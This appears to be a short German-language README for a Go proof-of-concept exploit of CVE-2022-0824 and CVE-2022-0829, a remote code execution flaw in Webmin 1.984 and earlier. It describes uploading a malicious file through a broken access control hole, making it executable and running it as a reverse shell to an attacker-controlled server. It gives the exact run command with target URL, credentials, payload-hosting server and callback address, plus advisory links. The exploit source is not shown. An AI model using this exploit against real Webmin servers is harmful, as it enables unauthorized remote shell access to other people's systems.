
Exploit-POC für CVE-2022-0824
RCE in Webmin <= 1.984
CVE-2022-0824 and CVE-2022-0829
Dies nutzt eine BAC-Sicherheitslücke in Webmin aus, um eine schädliche Datei hochzuladen, die Berechtigungen der Datei zu ändern und die Datei auszuführen. Die in der makePayload-Funktion erstellte Datei ist eine Reverse-Shell zurück zu einem vom Angreifer kontrollierten Server.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> Ziel-URL
c -> Anmeldedaten für Webmin
sl -> Ihre lokale Server-IP und Port zum Hosting Ihres Payloads
s -> Rückruf-IP
p -> Rückruf-Port
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824